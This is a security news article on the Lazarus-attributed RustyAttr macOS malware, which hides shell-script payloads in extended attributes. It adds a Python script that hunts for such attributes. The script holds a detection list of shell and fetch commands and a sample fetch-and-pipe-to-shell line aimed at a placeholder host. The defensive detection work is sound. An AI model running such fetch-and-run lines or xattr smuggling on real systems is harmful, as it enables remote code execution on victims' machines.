Threat actors have been observed using a novel technique that abuses extended attributes of macOS files to smuggle a new piece of malware called RustyAttr.
Group-IB, the Singapore-headquartered cybersecurity company that found the samples, has attributed the activity with moderate confidence to the North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps with prior campaigns, including RustBucket.
Extended attributes are additional metadata attached to files and directories; on macOS they can be listed and read with the dedicated xattr command (for example, `xattr -l <file>` prints every attribute and its value). They are normally used to store information beyond the standard attributes such as file size, timestamps, and permissions, which is also why macOS itself writes attributes like com.apple.quarantine to downloaded files.
The malicious applications discovered by Group-IB are built with Tauri, a cross-platform desktop application framework, and signed with a leaked certificate that Apple has since revoked. Each one carries an extended attribute whose content fetches and runs a shell script.
Executing the shell script also triggers a decoy that serves as a distraction, either an error message reading "This app does not support this version" or a seemingly benign PDF document about the development and funding of gaming projects.
"Upon executing the application, the Tauri application attempts to render a HTML webpage using a WebView," Group-IB security researcher Sharmine Low said. "The [threat actor] used some random template pulled off the internet."
What is also notable is that these web pages are engineered to load a malicious JavaScript, which reads the content of the extended attribute and hands it to a Rust backend for execution. The decoy web page is only displayed when no such extended attribute is present, so a copy of the application stripped of its attribute (for instance by a transfer that does not preserve xattrs) looks inert.
The end goal of the campaign remains unclear, particularly since there is no evidence of any follow-on payloads or confirmed victims.
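Because the loader described above runs whatever it finds in the extended attribute, and the attribute is the only place the payload lives on disk, the practical hunt for this technique is to enumerate every attribute on every file of interest and inspect the values rather than the names. The following script is an added example written for this article, not Group-IB's tooling and not the malware's own code. It reads extended attributes through os.listxattr/os.getxattr on Linux and through libc's listxattr/getxattr on macOS (Python's os module has no xattr helpers there), then flags values that contain a shebang or shell/fetch commands, or that sit under a non-Apple attribute name and consist mostly of text. The attribute names, marker list, length threshold, sample payload and the file name xattr_hunt.py are assumptions made for the example, not indicators from the report.

```python
"""Hunt for files whose extended attributes carry a script payload.

Added example, not Group-IB's tooling. Lists every extended attribute on
every file under a directory (stdlib os.* on Linux, libc on macOS) and
applies content heuristics to the values. Names, markers, threshold and
the sample payload are assumptions made for this example.
"""
import ctypes
import ctypes.util
import os
import sys
import tempfile
from typing import Dict, List, Optional, Tuple

if hasattr(os, "listxattr"):                       # Linux: stdlib wrappers exist
    def list_xattrs(path: str) -> List[str]:
        return os.listxattr(path, follow_symlinks=False)

    def get_xattr(path: str, name: str) -> bytes:
        return os.getxattr(path, name, follow_symlinks=False)

    def set_xattr(path: str, name: str, value: bytes) -> None:
        os.setxattr(path, name, value, follow_symlinks=False)
else:                                              # macOS: call libc directly
    _libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
    _NOFOLLOW = 0x0001                             # XATTR_NOFOLLOW from <sys/xattr.h>
    _libc.listxattr.restype = ctypes.c_ssize_t
    _libc.listxattr.argtypes = [ctypes.c_char_p, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
    _libc.getxattr.restype = ctypes.c_ssize_t
    _libc.getxattr.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_void_p,
                               ctypes.c_size_t, ctypes.c_uint32, ctypes.c_int]
    _libc.setxattr.restype = ctypes.c_int
    _libc.setxattr.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_void_p,
                               ctypes.c_size_t, ctypes.c_uint32, ctypes.c_int]

    def _check(n: int) -> int:                     # libc returns -1 and sets errno on error
        if n < 0:
            err = ctypes.get_errno()
            raise OSError(err, os.strerror(err))
        return n

    def list_xattrs(path: str) -> List[str]:
        p = path.encode()
        n = _check(_libc.listxattr(p, None, 0, _NOFOLLOW))      # size query
        buf = ctypes.create_string_buffer(n or 1)
        n = _check(_libc.listxattr(p, buf, n, _NOFOLLOW))
        return [x.decode(errors="replace") for x in buf.raw[:n].split(b"\0") if x]

    def get_xattr(path: str, name: str) -> bytes:
        p, nm = path.encode(), name.encode()
        n = _check(_libc.getxattr(p, nm, None, 0, 0, _NOFOLLOW))  # size query
        buf = ctypes.create_string_buffer(n or 1)
        n = _check(_libc.getxattr(p, nm, buf, n, 0, _NOFOLLOW))
        return buf.raw[:n]

    def set_xattr(path: str, name: str, value: bytes) -> None:
        _check(_libc.setxattr(path.encode(), name.encode(), value, len(value), 0, _NOFOLLOW))

# Substrings that indicate a shell script or a fetch-and-run one-liner (assumed list).
SCRIPT_MARKERS = (b"#!", b"/bin/sh", b"/bin/bash", b"/bin/zsh", b"osascript", b"curl ", b"wget ")
APPLE_PREFIX = "com.apple."                        # attributes macOS itself writes


def _mostly_text(value: bytes) -> bool:
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in value)
    return printable / len(value) > 0.95


def classify(attrs: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Return (attribute name, reason) for each attribute whose value looks like a payload."""
    hits = []
    for name, value in attrs.items():
        if any(m in value for m in SCRIPT_MARKERS):
            hits.append((name, "script-like content"))
        elif not name.startswith(APPLE_PREFIX) and len(value) >= 64 and _mostly_text(value):
            hits.append((name, "non-Apple attribute holding text"))
    return hits


def scan_tree(root: str) -> Dict[str, List[Tuple[str, str]]]:
    """Walk root and map each file path to its suspicious attributes."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                attrs = {n: get_xattr(path, n) for n in list_xattrs(path)}
            except OSError:
                continue                           # unreadable or vanished file
            hits = classify(attrs)
            if hits:
                findings[path] = hits
    return findings


# Constructed sample payload of the fetch-and-run kind the article describes.
SAMPLE_PAYLOAD = b"#!/bin/sh\ncurl -fsSL https://example.invalid/stage2 | /bin/sh\n"


def demo_roundtrip() -> Optional[bool]:
    """Plant SAMPLE_PAYLOAD in an xattr on a temp file and check that the scan flags it.
    Returns None when the filesystem refuses user xattrs (e.g. an old tmpfs)."""
    name = "user.demo.payload" if sys.platform.startswith("linux") else "demo.payload"
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "demo.bin")
        open(victim, "wb").close()
        try:
            set_xattr(victim, name, SAMPLE_PAYLOAD)
        except OSError:
            return None
        return any(n == name for n, _ in scan_tree(d).get(victim, []))


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/Applications"
    for path, hits in scan_tree(root).items():
        for attr_name, reason in hits:
            print(f"{path}: {attr_name} ({reason})")
```

Run it as `python3 xattr_hunt.py /Applications` (or any directory) and confirm a hit by hand with `xattr -l <file>` on macOS. The scan looks at the files on disk rather than launching them, which matters here: because the decoy page is only shown when the attribute is absent, a sample that has lost its attribute in transit behaves innocently in a sandbox and would be missed by dynamic analysis alone.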
"Fortunately, macOS systems provide some level of protection for the found samples," Low said. "To trigger the attack, users must disable Gatekeeper by overriding malware protection. It is likely that some degree of interaction and social engineering will be necessary to convince victims to take these steps."
The development comes as North Korean threat actors have been running extensive campaigns to secure remote jobs at companies around the world, and to trick existing employees of cryptocurrency companies into downloading malware under the pretext of coding interviews.